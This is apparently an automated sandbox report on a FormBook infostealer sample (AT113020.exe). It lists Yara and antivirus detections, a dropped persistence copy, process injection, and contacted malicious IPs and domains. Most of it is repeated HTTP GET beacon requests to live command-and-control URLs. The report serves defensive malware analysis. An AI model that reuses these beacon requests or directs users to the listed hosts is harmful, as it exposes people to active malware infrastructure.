Source: Yara match	File source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.0.238.42	unknown	Canada	22612	NAMECHEAP-NETUS	true
162.159.136.232	unknown	United States	13335	CLOUDFLARENETUS	false
157.245.239.6	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
23.227.38.74	unknown	Canada	13335	CLOUDFLARENETUS	true
208.91.197.27	unknown	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
66.235.200.146	unknown	United States	13335	CLOUDFLARENETUS	true
104.24.104.178	unknown	United States	13335	CLOUDFLARENETUS	true
52.60.87.163	unknown	United States	16509	AMAZON-02US	true
198.54.117.210	unknown	United States	22612	NAMECHEAP-NETUS	false
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
104.31.71.137	unknown	United States	13335	CLOUDFLARENETUS	true
198.54.117.215	unknown	United States	22612	NAMECHEAP-NETUS	true
162.159.134.233	unknown	United States	13335	CLOUDFLARENETUS	false

Contacted Domains

Name	IP	Active
discord.com	162.159.136.232	true
pocketspacer.com	34.102.136.180	true
parkingpage.namecheap.com	198.54.117.210	true
cdn.discordapp.com	162.159.134.233	true
www.dainikamarsomoy.com	104.24.104.178	true
shops.myshopify.com	23.227.38.74	true
www.ahomedokita.com	157.245.239.6	true
www.rodgroup.net	208.91.197.27	true
www.cia3mega.info	162.0.238.42	true
buttsliders.com	34.102.136.180	true
higherthan75.com	66.235.200.146	true
www.sportsbookmatcher.com	104.31.71.137	true
www.makingdoathome.com	52.60.87.163	true
www.higherthan75.com	unknown	unknown
www.countrybarndogkennel.com	unknown	unknown
www.buttsliders.com	unknown	unknown
www.kingdomwinecommunity.com	unknown	unknown
www.thanksforlove.com	unknown	unknown
g.msn.com	unknown	unknown
www.outtheframecustoms.com	unknown	unknown
www.theyolokart.com	unknown	unknown
www.pocketspacer.com	unknown	unknown
www.renabbeauty.com	unknown	unknown
www.rdhar1976.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.renabbeauty.com/9t6k/?URflh=73SmHps+05HxyxR+Sls8P85g8AMVj2xb8ZN5KGQQxUczRwjFANvvf8FlZWdGNK7+ujWZ&UfrDal=0nMpqJVP5t_PDD5p	true	Avira URL Cloud: safe	unknown
http://www.ahomedokita.com/9t6k/	true	Avira URL Cloud: safe	unknown
http://www.sportsbookmatcher.com/9t6k/	true	Avira URL Cloud: safe	unknown
http://www.buttsliders.com/9t6k/?URflh=tVqqbIXu9nslI248AUXCUxr0o0zC9i0c8STc7UOUyN+2mFy87kkATVtNwFSSPJTjqgHk&UfrDal=0nMpqJVP5t_PDD5p	true	Avira URL Cloud: safe	unknown
http://www.theyolokart.com/9t6k/?URflh=wzqvVRf3v7wWdKVsEzaCYluZDwjvGR+wpj+mt/yOJMnJEVZY6i5f9AVoqOYOhCkuGFts&UfrDal=0nMpqJVP5t_PDD5p	true	Avira URL Cloud: safe	unknown
http://www.renabbeauty.com/9t6k/	true	Avira URL Cloud: safe	unknown
http://www.makingdoathome.com/9t6k/?URflh=DaVCjFuxi8IQ0KSmZmVVzdfbFs8HKa1S3sC5D9GQ7HSGSXmO4QACkgMj7QCmBzxlGckN&UfrDal=0nMpqJVP5t_PDD5p	true	Avira URL Cloud: safe	unknown
http://www.dainikamarsomoy.com/9t6k/?URflh=W7vyYWXucRnMwWrTc6z6xJ7ly1Aaea5WWr62fhSAhoSHJNEqGWpe7zCBU0dcNM6Zeho8&UfrDal=0nMpqJVP5t_PDD5p	true	Avira URL Cloud: safe	unknown
http://www.higherthan75.com/9t6k/?URflh=WRaEwe7grAm8RcFyQBNRvy9NVNi7wOvDLX3hizJdol6io43A3OIdw5NSblbyY8qTqmIe&UfrDal=0nMpqJVP5t_PDD5p	true	Avira URL Cloud: safe	unknown
http://www.ahomedokita.com/9t6k/?URflh=5YbgiWOMvK10e+D+Ti4oKvmTwuSwaKBdeKNLrkVAsRRvF5LwbTMOesGYedm1bG3cJWIa&UfrDal=0nMpqJVP5t_PDD5p	true	Avira URL Cloud: safe	unknown
http://www.cia3mega.info/9t6k/?URflh=8pT0OCjpukmgT2/VEONoh7Jhw41r4itI2gwuQkgKFiQj+4gEMjoX0rzJNNSQA5Q1OcRE&UfrDal=0nMpqJVP5t_PDD5p	true	Avira URL Cloud: safe	unknown
http://www.pocketspacer.com/9t6k/	true	Avira URL Cloud: safe	unknown
http://www.thanksforlove.com/9t6k/?URflh=kTde6z/9FBgibCJh75hFV8EYWatL1OQ/rhfr5oU2UZBR6XWcBOIn723UV5Uezh3ZQ4ot&UfrDal=0nMpqJVP5t_PDD5p	true	Avira URL Cloud: safe	unknown
http://www.dainikamarsomoy.com/9t6k/	true	Avira URL Cloud: safe	unknown
http://www.makingdoathome.com/9t6k/	true	Avira URL Cloud: safe	unknown
http://www.kingdomwinecommunity.com/9t6k/?URflh=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN346XCugNKhu9g&UfrDal=0nMpqJVP5t_PDD5p	true	Avira URL Cloud: safe	unknown
http://www.rodgroup.net/9t6k/?URflh=+VDOv2YqGr3HQyUjxvr4ySDa222PNTvrG/MhsshnzvB0EZlKybOlzjmZT3Iubthnocji&UfrDal=0nMpqJVP5t_PDD5p	true	Avira URL Cloud: safe	unknown
http://www.outtheframecustoms.com/9t6k/?URflh=b8EUNPE+oYf5M4MWpXscm/Bt3xsjLt8hNenJJ3DjxXNjYfRDWC0pztruTX9IDl5bQG1I&UfrDal=0nMpqJVP5t_PDD5p	true	Avira URL Cloud: safe	unknown
http://www.outtheframecustoms.com/9t6k/	true	Avira URL Cloud: safe	unknown
http://www.thanksforlove.com/9t6k/	true	Avira URL Cloud: safe	unknown
http://www.rodgroup.net/9t6k/	true	Avira URL Cloud: safe	unknown
http://www.pocketspacer.com/9t6k/?URflh=rm4JCycf8jgnKzL2gaZxJFxF+HyMTTLQtqzA4xmgqdXyWq3yu1ARpOH0ZAK4rmQWxcAt&UfrDal=0nMpqJVP5t_PDD5p	true	Avira URL Cloud: safe	unknown

AV Detection:

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe

ReversingLabs: Detection: 42%

Multi AV Scanner detection for submitted file

Source: AT113020.exe

ReversingLabs: Detection: 42%

Yara detected FormBook

Source: Yara match	File source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE

Antivirus or Machine Learning detection for unpacked file

Source: 5.2.Accfdrv.exe.27f0000.4.unpack	Avira: Label: TR/Hijacker.Gen
Source: 1.2.AT113020.exe.2ad0000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.AT113020.exe.27d0000.4.unpack	Avira: Label: TR/Hijacker.Gen
Source: 5.2.Accfdrv.exe.2af0000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.ieinstal.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 16.2.ieinstal.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.2.Accfdrv.exe.4ac0000.6.unpack	Avira: Label: TR/Hijacker.Gen
Source: 12.2.Accfdrv.exe.4dc0000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.ieinstal.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe

Code function: 5_2_00405DBC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

5_2_00405DBC

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\AT113020.exe	Code function: 4x nop then mov edx, esp		1_2_0048ACB4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 4x nop then mov edx, esp		5_2_0048ACB4

Networking:

Contains functionality to check if a connection to the internet is available

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe

Code function: 5_2_040FE488 InternetCheckConnectionA,

5_2_040FE488

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=WRaEwe7grAm8RcFyQBNRvy9NVNi7wOvDLX3hizJdol6io43A3OIdw5NSblbyY8qTqmIe&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.higherthan75.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=73SmHps+05HxyxR+Sls8P85g8AMVj2xb8ZN5KGQQxUczRwjFANvvf8FlZWdGNK7+ujWZ&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.renabbeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=5YbgiWOMvK10e+D+Ti4oKvmTwuSwaKBdeKNLrkVAsRRvF5LwbTMOesGYedm1bG3cJWIa&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.ahomedokita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=W7vyYWXucRnMwWrTc6z6xJ7ly1Aaea5WWr62fhSAhoSHJNEqGWpe7zCBU0dcNM6Zeho8&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN346XCugNKhu9g&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=rm4JCycf8jgnKzL2gaZxJFxF+HyMTTLQtqzA4xmgqdXyWq3yu1ARpOH0ZAK4rmQWxcAt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.pocketspacer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=E4R/8wd6fgEkWdVXGUezTNl/uDJNCiSgqhAFvmJDlfqfpwFCHVrHgZ/vPMmlVzFxpgLt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=+VDOv2YqGr3HQyUjxvr4ySDa222PNTvrG/MhsshnzvB0EZlKybOlzjmZT3Iubthnocji&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.rodgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=tVqqbIXu9nslI248AUXCUxr0o0zC9i0c8STc7UOUyN+2mFy87kkATVtNwFSSPJTjqgHk&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.buttsliders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=kTde6z/9FBgibCJh75hFV8EYWatL1OQ/rhfr5oU2UZBR6XWcBOIn723UV5Uezh3ZQ4ot&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.thanksforlove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=b8EUNPE+oYf5M4MWpXscm/Bt3xsjLt8hNenJJ3DjxXNjYfRDWC0pztruTX9IDl5bQG1I&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.outtheframecustoms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=wzqvVRf3v7wWdKVsEzaCYluZDwjvGR+wpj+mt/yOJMnJEVZY6i5f9AVoqOYOhCkuGFts&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.theyolokart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=WRaEwe7grAm8RcFyQBNRvy9NVNi7wOvDLX3hizJdol6io43A3OIdw5NSblbyY8qTqmIe&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.higherthan75.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=73SmHps+05HxyxR+Sls8P85g8AMVj2xb8ZN5KGQQxUczRwjFANvvf8FlZWdGNK7+ujWZ&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.renabbeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=5YbgiWOMvK10e+D+Ti4oKvmTwuSwaKBdeKNLrkVAsRRvF5LwbTMOesGYedm1bG3cJWIa&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.ahomedokita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=W7vyYWXucRnMwWrTc6z6xJ7ly1Aaea5WWr62fhSAhoSHJNEqGWpe7zCBU0dcNM6Zeho8&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN346XCugNKhu9g&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=rm4JCycf8jgnKzL2gaZxJFxF+HyMTTLQtqzA4xmgqdXyWq3yu1ARpOH0ZAK4rmQWxcAt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.pocketspacer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=E4R/8wd6fgEkWdVXGUezTNl/uDJNCiSgqhAFvmJDlfqfpwFCHVrHgZ/vPMmlVzFxpgLt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=DaVCjFuxi8IQ0KSmZmVVzdfbFs8HKa1S3sC5D9GQ7HSGSXmO4QACkgMj7QCmBzxlGckN&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.makingdoathome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=+VDOv2YqGr3HQyUjxvr4ySDa222PNTvrG/MhsshnzvB0EZlKybOlzjmZT3Iubthnocji&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.rodgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=tVqqbIXu9nslI248AUXCUxr0o0zC9i0c8STc7UOUyN+2mFy87kkATVtNwFSSPJTjqgHk&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.buttsliders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=kTde6z/9FBgibCJh75hFV8EYWatL1OQ/rhfr5oU2UZBR6XWcBOIn723UV5Uezh3ZQ4ot&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.thanksforlove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=b8EUNPE+oYf5M4MWpXscm/Bt3xsjLt8hNenJJ3DjxXNjYfRDWC0pztruTX9IDl5bQG1I&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.outtheframecustoms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=wzqvVRf3v7wWdKVsEzaCYluZDwjvGR+wpj+mt/yOJMnJEVZY6i5f9AVoqOYOhCkuGFts&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.theyolokart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=WRaEwe7grAm8RcFyQBNRvy9NVNi7wOvDLX3hizJdol6io43A3OIdw5NSblbyY8qTqmIe&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.higherthan75.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=73SmHps+05HxyxR+Sls8P85g8AMVj2xb8ZN5KGQQxUczRwjFANvvf8FlZWdGNK7+ujWZ&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.renabbeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=5YbgiWOMvK10e+D+Ti4oKvmTwuSwaKBdeKNLrkVAsRRvF5LwbTMOesGYedm1bG3cJWIa&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.ahomedokita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=W7vyYWXucRnMwWrTc6z6xJ7ly1Aaea5WWr62fhSAhoSHJNEqGWpe7zCBU0dcNM6Zeho8&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN346XCugNKhu9g&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=rm4JCycf8jgnKzL2gaZxJFxF+HyMTTLQtqzA4xmgqdXyWq3yu1ARpOH0ZAK4rmQWxcAt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.pocketspacer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=8pT0OCjpukmgT2/VEONoh7Jhw41r4itI2gwuQkgKFiQj+4gEMjoX0rzJNNSQA5Q1OcRE&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.cia3mega.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=E4R/8wd6fgEkWdVXGUezTNl/uDJNCiSgqhAFvmJDlfqfpwFCHVrHgZ/vPMmlVzFxpgLt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=DaVCjFuxi8IQ0KSmZmVVzdfbFs8HKa1S3sC5D9GQ7HSGSXmO4QACkgMj7QCmBzxlGckN&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.makingdoathome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=+VDOv2YqGr3HQyUjxvr4ySDa222PNTvrG/MhsshnzvB0EZlKybOlzjmZT3Iubthnocji&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.rodgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=tVqqbIXu9nslI248AUXCUxr0o0zC9i0c8STc7UOUyN+2mFy87kkATVtNwFSSPJTjqgHk&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.buttsliders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=kTde6z/9FBgibCJh75hFV8EYWatL1OQ/rhfr5oU2UZBR6XWcBOIn723UV5Uezh3ZQ4ot&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.thanksforlove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=b8EUNPE+oYf5M4MWpXscm/Bt3xsjLt8hNenJJ3DjxXNjYfRDWC0pztruTX9IDl5bQG1I&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.outtheframecustoms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=wzqvVRf3v7wWdKVsEzaCYluZDwjvGR+wpj+mt/yOJMnJEVZY6i5f9AVoqOYOhCkuGFts&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.theyolokart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=WRaEwe7grAm8RcFyQBNRvy9NVNi7wOvDLX3hizJdol6io43A3OIdw5NSblbyY8qTqmIe&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.higherthan75.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=73SmHps+05HxyxR+Sls8P85g8AMVj2xb8ZN5KGQQxUczRwjFANvvf8FlZWdGNK7+ujWZ&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.renabbeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=5YbgiWOMvK10e+D+Ti4oKvmTwuSwaKBdeKNLrkVAsRRvF5LwbTMOesGYedm1bG3cJWIa&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.ahomedokita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=W7vyYWXucRnMwWrTc6z6xJ7ly1Aaea5WWr62fhSAhoSHJNEqGWpe7zCBU0dcNM6Zeho8&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN346XCugNKhu9g&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=rm4JCycf8jgnKzL2gaZxJFxF+HyMTTLQtqzA4xmgqdXyWq3yu1ARpOH0ZAK4rmQWxcAt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.pocketspacer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
